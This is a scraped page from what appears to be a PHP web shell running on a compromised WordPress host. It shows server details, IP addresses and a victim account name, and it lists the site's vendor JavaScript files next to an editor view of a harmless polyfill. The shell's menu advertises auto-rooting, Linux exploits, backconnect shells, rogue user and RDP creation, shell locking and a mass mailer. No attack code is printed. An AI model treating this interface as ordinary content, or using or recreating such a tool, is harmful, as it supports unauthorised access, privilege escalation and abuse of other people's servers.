Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www /
wp-includes /
js /
dist /
vendor /
[ HOME SHELL ]
Name
Size
Permission
Action
lodash.js
531.35
KB
-rw-r--r--
lodash.min.js
71.3
KB
-rw-r--r--
moment.js
169.75
KB
-rw-r--r--
moment.min.js
56.95
KB
-rw-r--r--
react-dom.js
908.95
KB
-rw-r--r--
react-dom.min.js
111.45
KB
-rw-r--r--
react.js
117.23
KB
-rw-r--r--
react.min.js
13
KB
-rw-r--r--
wp-polyfill-dom-rect.js
1.87
KB
-rw-r--r--
wp-polyfill-dom-rect.min.js
867
B
-rw-r--r--
wp-polyfill-element-closest.js
895
B
-rw-r--r--
wp-polyfill-element-closest.mi...
417
B
-rw-r--r--
wp-polyfill-fetch.js
14.46
KB
-rw-r--r--
wp-polyfill-fetch.min.js
7.72
KB
-rw-r--r--
wp-polyfill-formdata.js
9.41
KB
-rw-r--r--
wp-polyfill-formdata.min.js
7
KB
-rw-r--r--
wp-polyfill-node-contains.js
531
B
-rw-r--r--
wp-polyfill-node-contains.min....
353
B
-rw-r--r--
wp-polyfill-url.js
107.75
KB
-rw-r--r--
wp-polyfill-url.min.js
45.98
KB
-rw-r--r--
wp-polyfill.js
234.11
KB
-rw-r--r--
wp-polyfill.min.js
96.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-polyfill-element-closest.js
// element-closest | CC0-1.0 | github.com/jonathantneal/closest (function (ElementProto) { if (typeof ElementProto.matches !== 'function') { ElementProto.matches = ElementProto.msMatchesSelector || ElementProto.mozMatchesSelector || ElementProto.webkitMatchesSelector || function matches(selector) { var element = this; var elements = (element.document || element.ownerDocument).querySelectorAll(selector); var index = 0; while (elements[index] && elements[index] !== element) { ++index; } return Boolean(elements[index]); }; } if (typeof ElementProto.closest !== 'function') { ElementProto.closest = function closest(selector) { var element = this; while (element && element.nodeType === 1) { if (element.matches(selector)) { return element; } element = element.parentNode; } return null; }; } })(window.Element.prototype);
Close